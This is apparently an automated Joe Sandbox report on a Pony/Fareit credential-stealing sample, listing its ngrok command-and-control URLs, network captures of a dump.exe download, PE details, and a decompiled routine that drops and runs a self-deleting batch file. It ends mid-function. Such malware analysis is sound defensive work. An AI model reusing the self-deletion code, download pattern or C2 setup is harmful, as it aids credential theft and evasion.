http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://63e2e5290bcf.ngrok.io/dump.exe	0%	Avira URL Cloud	safe
http://63e2e5290bcf.ngrok.io/gate.phphttp://63e2e5290bcf.ngrok.io/dump.exeYUIPWDFILE0YUIPKDFILE0YUIC	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
63e2e5290bcf.ngrok.io	3.13.191.225	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://63e2e5290bcf.ngrok.io/dump.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	eQDy6dGVwQ.exe	false	Avira URL Cloud: safe	low
https://ac.ecosia.org/autocomplete?q=	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	eQDy6dGVwQ.exe	false	Avira URL Cloud: safe	low
http://63e2e5290bcf.ngrok.io/gate.php	eQDy6dGVwQ.exe	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	eQDy6dGVwQ.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high
http://63e2e5290bcf.ngrok.io/gate.phphttp://63e2e5290bcf.ngrok.io/dump.exeYUIPWDFILE0YUIPKDFILE0YUIC	eQDy6dGVwQ.exe	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.13.191.225	63e2e5290bcf.ngrok.io	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	376014
Start date:	25.03.2021
Start time:	16:33:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	eQDy6dGVwQ.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 97.8%) Quality average: 84.6% Quality standard deviation: 23.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 168.61.161.212, 23.54.113.53, 13.88.21.125 Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, skypedataprdcolwus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, store-images.s-microsoft.com-c.edgekey.net, watson.telemetry.microsoft.com, skypedataprdcolwus15.cloudapp.net Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
3.13.191.225	zNx73OMw1y.exe	Get hash	malicious	Browse
	5mYTdqqvw1.exe	Get hash	malicious	Browse
	9bYxuF9KrT.exe	Get hash	malicious	Browse
	JuMh4hUanr.exe	Get hash	malicious	Browse
	MXfPzdKLDO.exe	Get hash	malicious	Browse
	2TEKb7PdvN.exe	Get hash	malicious	Browse
	xKeHI0tf38.exe	Get hash	malicious	Browse
	AsyncClient - Copy.exe	Get hash	malicious	Browse
	H9cWKER9Ca.exe	Get hash	malicious	Browse
	QL8LP18ukM.exe	Get hash	malicious	Browse
	pqa0cpFF0r.exe	Get hash	malicious	Browse
	Bx757nPqML.exe	Get hash	malicious	Browse
	0YeDphMbMa.exe	Get hash	malicious	Browse
	F5SaKVp0.exe	Get hash	malicious	Browse
	yWETxQps.exe	Get hash	malicious	Browse
	VryE7Rq2.exe	Get hash	malicious	Browse
	4ubvZ6GdWv.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.DownLoader34.18436.32216.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	o2.exe	Get hash	malicious	Browse	18.188.109.70
	Meetup_LogiCameraSettings_2.5.17.exe	Get hash	malicious	Browse	52.94.28.172
	mar2403.xlsx	Get hash	malicious	Browse	54.180.158.181
	Invoice.xlsx	Get hash	malicious	Browse	54.180.158.181
	Revised Signed Proforma Invoice 000856453553.exe	Get hash	malicious	Browse	3.131.252.17
	Q lifesettlements INVOICE.htm	Get hash	malicious	Browse	15.237.76.117
	NEW ORDER 3742.exe	Get hash	malicious	Browse	13.55.94.210
	7Q5Er1TObp.exe	Get hash	malicious	Browse	44.227.65.245
	4d86320858effdc2c8bf3fc2ae86080f0f6b449141991.dll	Get hash	malicious	Browse	143.204.3.74
	Bs04AQyK2o.exe	Get hash	malicious	Browse	18.219.49.238
	yZEqL0ovOF.dll	Get hash	malicious	Browse	143.204.3.74
	SecuriteInfo.com.Variant.Razy.854842.26563.exe	Get hash	malicious	Browse	35.162.32.82
	BraveBrowserSetup.exe	Get hash	malicious	Browse	143.204.209.32
	Feb SOA.xlsx	Get hash	malicious	Browse	18.158.19.118
	Tl36BaDp7L.dll	Get hash	malicious	Browse	52.84.51.72
	x2I11QaLmb.dll	Get hash	malicious	Browse	52.84.51.72
	44279.8611321759.dll	Get hash	malicious	Browse	52.84.51.72
	44279.8611321859.dll	Get hash	malicious	Browse	52.84.51.72
	9wRKBsPvUT.dll	Get hash	malicious	Browse	13.226.135.72
	nIXvr6hak8.dll	Get hash	malicious	Browse	13.226.135.72

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\4066921.bat Download File
Process:	C:\Users\user\Desktop\eQDy6dGVwQ.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	3.233204299824007
Encrypted:	false
SSDEEP:	3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
MD5:	3880EEB1C736D853EB13B44898B718AB
SHA1:	4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
SHA-256:	936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
SHA-512:	3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.198137158347105
TrID:	Win32 Executable (generic) a (10002005/4) 99.56% Win32 EXE Yoda's Crypter (26571/9) 0.26% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	eQDy6dGVwQ.exe
File size:	92672
MD5:	eb2fbc15dfb24af75c431b7525fed6e7
SHA1:	f060052cf7ee32a7aa2fa17f9f749880b70ffff3
SHA256:	5ee70bdf6cfa9c2742889a7c724fa6940e40c64d6ab420303ea6e031ae3d6ce4
SHA512:	b7026378df14d900c7d2e43ed9a2eda12aeedf506f80936effb7bd505da6b138cc230c220092d7e7693f63d328f6575622c056487f45221839cab20df03f40f3
SSDEEP:	1536:UnSncgyGqTDRXmGcwSCfZDalZNg9tvo0iO3AX4ApTvMEIakzmt2l:2SnMuGc/CfZDap6COU45EIitm
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......U...............2.....R......!........0....@........................................................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x410621
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x55FD15FA [Sat Sep 19 07:59:54 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	09070e021d4505e6183701ac6e022a16

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
pop ebp
push 0041062Fh
clc
jc 00007FD5389A5693h
ret
jmp far eax
push esp
add byte ptr [eax], al
add byte ptr [ecx+0000000Ah], bh
xor edx, edx
div ecx
cmp edx, 05h
jne 00007FD5389A5694h
jmp 00007FD5389A5694h
jmp 00007FD5389A567Bh
call 00007FD5389A560Dh
push 00000000h
call 00007FD5389A57C1h
jmp dword ptr [00418148h]
jmp dword ptr [0041814Ch]
jmp dword ptr [00418150h]
jmp dword ptr [00418154h]
jmp dword ptr [00418158h]
jmp dword ptr [0041815Ch]
jmp dword ptr [00418160h]
jmp dword ptr [00418164h]
jmp dword ptr [00418168h]
jmp dword ptr [0041816Ch]
jmp dword ptr [00418170h]
jmp dword ptr [00418174h]
jmp dword ptr [00418178h]
jmp dword ptr [0041817Ch]
jmp dword ptr [00418180h]
jmp dword ptr [00418184h]
jmp dword ptr [00418188h]
jmp dword ptr [0041818Ch]
jmp dword ptr [00418190h]
jmp dword ptr [00418194h]
jmp dword ptr [00418198h]
jmp dword ptr [0041819Ch]
jmp dword ptr [004181A0h]
jmp dword ptr [004181A4h]
jmp dword ptr [004181A8h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17ef0	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11a4b	0x11c00	False	0.460566131162	data	6.06293067263	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x100	0x200	False	0.392578125	data	3.04800455669	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x14000	0x4ea8	0x4a00	False	0.403769003378	data	5.19839782997	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.DLL	CreateFileA, ReadFile, CloseHandle, WriteFile, lstrlenA, GlobalLock, GlobalUnlock, LocalFree, LocalAlloc, GetTickCount, lstrcpyA, lstrcatA, GetFileAttributesA, ExpandEnvironmentStringsA, GetFileSize, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, GetProcAddress, GetTempPathA, CreateDirectoryA, DeleteFileA, GetCurrentProcess, WideCharToMultiByte, GetLastError, lstrcmpA, CreateToolhelp32Snapshot, Process32First, OpenProcess, Process32Next, FindFirstFileA, lstrcmpiA, FindNextFileA, FindClose, GetModuleHandleA, GetVersionExA, GetLocaleInfoA, GetSystemInfo, GetWindowsDirectoryA, GetPrivateProfileStringA, SetCurrentDirectoryA, GetPrivateProfileSectionNamesA, GetPrivateProfileIntA, GetCurrentDirectoryA, lstrlenW, MultiByteToWideChar, Sleep, GetModuleFileNameA, LCMapStringA, ExitProcess, SetUnhandledExceptionFilter
advapi32.dll	RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyA, RegEnumKeyExA, RegCreateKeyA, RegSetValueExA, IsTextUnicode, RegOpenCurrentUser, RegEnumValueA, GetUserNameA
ole32.dll	CreateStreamOnHGlobal, GetHGlobalFromStream, CoCreateGuid, CoTaskMemFree, CoCreateInstance, OleInitialize
shell32.dll	ShellExecuteA
shlwapi.dll	StrStrIA, StrRChrIA, StrToIntA, StrStrA, StrCmpNIA, StrStrIW
user32.dll	wsprintfA
userenv.dll	LoadUserProfileA, UnloadUserProfile
wininet.dll	InternetCrackUrlA, InternetCreateUrlA
wsock32.dll	inet_addr, gethostbyname, socket, connect, closesocket, send, select, recv, setsockopt, WSAStartup

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/25/21-16:34:00.175423	TCP	2014562	ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98	49725	80	192.168.2.4	3.13.191.225
03/25/21-16:34:00.175423	TCP	2014234	ET TROJAN Fareit/Pony Downloader Checkin 3	49725	80	192.168.2.4	3.13.191.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2021 16:34:00.063608885 CET	49725	80	192.168.2.4	3.13.191.225
Mar 25, 2021 16:34:00.175158978 CET	80	49725	3.13.191.225	192.168.2.4
Mar 25, 2021 16:34:00.175260067 CET	49725	80	192.168.2.4	3.13.191.225
Mar 25, 2021 16:34:00.175422907 CET	49725	80	192.168.2.4	3.13.191.225
Mar 25, 2021 16:34:00.287456989 CET	80	49725	3.13.191.225	192.168.2.4
Mar 25, 2021 16:34:00.287486076 CET	80	49725	3.13.191.225	192.168.2.4
Mar 25, 2021 16:34:00.287513018 CET	80	49725	3.13.191.225	192.168.2.4
Mar 25, 2021 16:34:00.287604094 CET	49725	80	192.168.2.4	3.13.191.225
Mar 25, 2021 16:34:00.299055099 CET	49725	80	192.168.2.4	3.13.191.225
Mar 25, 2021 16:34:00.410496950 CET	80	49725	3.13.191.225	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2021 16:33:51.450567961 CET	64646	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:51.463440895 CET	53	64646	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:52.086076021 CET	65298	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:52.099673033 CET	53	65298	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:53.203974009 CET	59123	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:53.216629982 CET	53	59123	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:54.019910097 CET	54531	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:54.032440901 CET	53	54531	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:54.153573990 CET	49714	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:54.171786070 CET	53	49714	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:54.839554071 CET	58028	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:54.854991913 CET	53	58028	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:55.856831074 CET	53097	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:55.869482040 CET	53	53097	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:56.950942993 CET	49257	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:56.963669062 CET	53	49257	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:58.021019936 CET	62389	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:58.033957958 CET	53	62389	8.8.8.8	192.168.2.4
Mar 25, 2021 16:33:58.763385057 CET	49910	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:33:58.776705980 CET	53	49910	8.8.8.8	192.168.2.4
Mar 25, 2021 16:34:00.042227030 CET	55854	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:34:00.057259083 CET	53	55854	8.8.8.8	192.168.2.4
Mar 25, 2021 16:34:01.174869061 CET	64549	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:34:01.187585115 CET	53	64549	8.8.8.8	192.168.2.4
Mar 25, 2021 16:34:03.351310015 CET	63153	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:34:03.364630938 CET	53	63153	8.8.8.8	192.168.2.4
Mar 25, 2021 16:34:04.252389908 CET	52991	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:34:04.264379978 CET	53	52991	8.8.8.8	192.168.2.4
Mar 25, 2021 16:34:04.941294909 CET	53700	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:34:04.953236103 CET	53	53700	8.8.8.8	192.168.2.4
Mar 25, 2021 16:34:05.860275030 CET	51726	53	192.168.2.4	8.8.8.8
Mar 25, 2021 16:34:05.872997999 CET	53	51726	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 25, 2021 16:34:00.042227030 CET	192.168.2.4	8.8.8.8	0x483d	Standard query (0)	63e2e5290bcf.ngrok.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 25, 2021 16:34:00.057259083 CET	8.8.8.8	192.168.2.4	0x483d	No error (0)	63e2e5290bcf.ngrok.io		3.13.191.225	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

63e2e5290bcf.ngrok.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49725	3.13.191.225	80	C:\Users\user\Desktop\eQDy6dGVwQ.exe

Timestamp	kBytes transferred	Direction	Data
Mar 25, 2021 16:34:00.175422907 CET	839	OUT	GET /dump.exe HTTP/1.0 Host: 63e2e5290bcf.ngrok.io Accept: / Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Mar 25, 2021 16:34:00.287486076 CET	908	IN	HTTP/1.0 404 Not Found Connection: close Content-Type: text/plain Date: Thu, 25 Mar 2021 15:34:00 GMT Content-Length: 38 Data Raw: 54 75 6e 6e 65 6c 20 36 33 65 32 65 35 32 39 30 62 63 66 2e 6e 67 72 6f 6b 2e 69 6f 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Tunnel 63e2e5290bcf.ngrok.io not found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: eQDy6dGVwQ.exe PID: 1316 Parent PID: 4116

General

Start time:	16:33:58
Start date:	25/03/2021
Path:	C:\Users\user\Desktop\eQDy6dGVwQ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\eQDy6dGVwQ.exe'
Imagebase:	0x400000
File size:	92672 bytes
MD5 hash:	EB2FBC15DFB24AF75C431B7525FED6E7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp, Author: Joe Security Rule: pony, Description: Identify Pony, Source: 00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: pony, Description: Identify Pony, Source: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.649049920.0000000000413000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 408 Parent PID: 1316

General

Start time:	16:34:02
Start date:	25/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6548 Parent PID: 408

General

Start time:	16:34:02
Start date:	25/03/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: eQDy6dGVwQ.exe PID: 1316 Parent PID: 4116 eQDy6dGVwQ.exeCOMMON

Executed Functions

Function 00410065, Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00410065(void* __eax, void* __ebx, void* __eflags) {
				CHAR* _v32;
				char* _v36;
				void* _v40;
				int _v44;
				CHAR* _v48;
				int _t35;
				char* _t36;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t44;
				struct HINSTANCE__* _t48;
				void* _t53;
				void* _t57;

				_push(0x410079);
				asm("clc");
				if(__eflags < 0) {
					 *((intOrPtr*)(__ebx - 0x6f36742e)) =  *((intOrPtr*)(__ebx - 0x6f36742e)) - 1;
					_v48 = E004018CF(0x105);
					wsprintfA(_v48, "%d.bat", GetTickCount());
					_v32 = E004018CF(0x105);
					_t35 = E004018CF(0x105);
					_v44 = _t35;
					_t36 = E004018CF(0x105);
					_v36 = _t36;
					GetModuleFileNameA( *0x4173ca, _v32, 0x104);
					_t39 = GetTempPathA(0x104, _v44);
					__eflags = _t39;
					if(_t39 != 0) {
						_push(_v48);
						_push(_v44);
						L00410694();
					}
					_push(0);
					_push(0);
					_push(2);
					_push(0);
					_push(3);
					_push(0xc0000000);
					ExitProcess(_v44); // executed
					_v40 = _t39;
					_t41 = _t39 + 0x00000001 | _t39 + 0x00000001;
					__eflags = _t41;
					if(_t41 != 0) {
						L8:
						_push("\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ");
						L0041066A();
						_t42 = E00401422(_v40, "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ", _t41); // executed
						CloseHandle(_v40);
						_t44 = _t42;
						__eflags = _t44;
						if(_t44 != 0) {
							wsprintfA(_v36, "      \"%s\"   ", _v32);
							_t48 = LoadLibraryA("shell32.dll");
							__eflags = _t48;
							if(_t48 != 0) {
								_t53 = GetProcAddress(_t48, "ShellExecuteA");
								__eflags = _t53;
								if(_t53 != 0) {
									ShellExecuteA(0, "open", _v44, _v36, 0, 0); // executed
								}
							}
						}
					} else {
						_push(_v32);
						_push(_v44);
						L0041068E();
						_t57 = StrRChrIA(_v44, 0, 0x5c);
						__eflags = _t57;
						if(_t57 != 0) {
							_t57 = _t57 + 1;
							__eflags = _t57;
							_push(_v48);
							_push(_t57);
							L0041068E();
						}
						_push(0);
						_push(0);
						_push(2);
						_push(0);
						_push(3);
						_push(0xc0000000);
						ExitProcess(_v44);
						_v40 = _t57;
						_t41 = _t57 + 1;
						__eflags = _t41;
						if(_t41 != 0) {
							goto L8;
						}
					}
					E004018B8(_v48);
					E004018B8(_v32);
					E004018B8(_v44);
					return E004018B8(_v36);
				} else {
					return __eax;
				}
			}

0x0041006f
0x00410074
0x00410075
0x00410078
0x0041008e
0x004100a0
0x004100b8
0x004100c5
0x004100cf
0x004100d8
0x004100e6
0x00410100
0x0041011b
0x0041011b
0x0041011d
0x00410124
0x00410127
0x0041012a
0x0041012a
0x00410131
0x00410133
0x00410135
0x00410137
0x00410139
0x0041013b
0x00410143
0x0041014a
0x00410150
0x00410150
0x00410152
0x00410196
0x00410196
0x0041019b
0x004101a9
0x004101b2
0x004101b7
0x004101b8
0x004101ba
0x004101c9
0x004101db
0x004101db
0x004101dd
0x004101e5
0x004101ea
0x004101ec
0x004101ff
0x004101ff
0x004101ec
0x004101dd
0x00410154
0x00410154
0x00410157
0x0041015a
0x0041016b
0x0041016b
0x0041016d
0x0041016f
0x0041016f
0x00410170
0x00410173
0x00410174
0x00410174
0x00410179
0x0041017b
0x0041017d
0x0041017f
0x00410181
0x00410183
0x0041018b
0x00410190
0x00410193
0x00410193
0x00410194
0x00000000
0x00000000
0x00410194
0x00410204
0x0041020c
0x00410214
0x00410222
0x00410077
0x00410077
0x00410077

APIs

GetTickCount.KERNEL32 ref: 00410092
wsprintfA.USER32 ref: 004100A0
GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
lstrcat.KERNEL32(?,?), ref: 0041012A
ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
lstrcpy.KERNEL32(?,?), ref: 0041015A
StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
lstrcpy.KERNEL32(00000001,?), ref: 00410174

Strings

shell32.dll, xrefs: 004101D1
open, xrefs: 004101F8
%d.bat, xrefs: 00410098
"%s" , xrefs: 004101C1
:ktk del %1 if exist %1 goto ktk del %0 , xrefs: 00410196, 004101A1
ShellExecuteA, xrefs: 004101DF

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
API String ID: 629621046-4169620016
Opcode ID: 68361a92b31e2b9e819e4902597b623312bae0e346fa83142876c966885b8850
Instruction ID: d87f7c95a24b28c2337a621791b8d5a4a1afbdb6f7934d1f864dba4089bdb773
Opcode Fuzzy Hash: 68361a92b31e2b9e819e4902597b623312bae0e346fa83142876c966885b8850
Instruction Fuzzy Hash: C5413030B542057ADF1576A18C03FEE7AA7AB85704F24843A7614F62E1EEF94DD05A1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBA3, Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EBA3(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				char* _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				char _v2100;
				intOrPtr _v2104;
				intOrPtr _v2108;
				char _v2112;
				intOrPtr _v2116;
				intOrPtr _v2120;
				char _v2124;
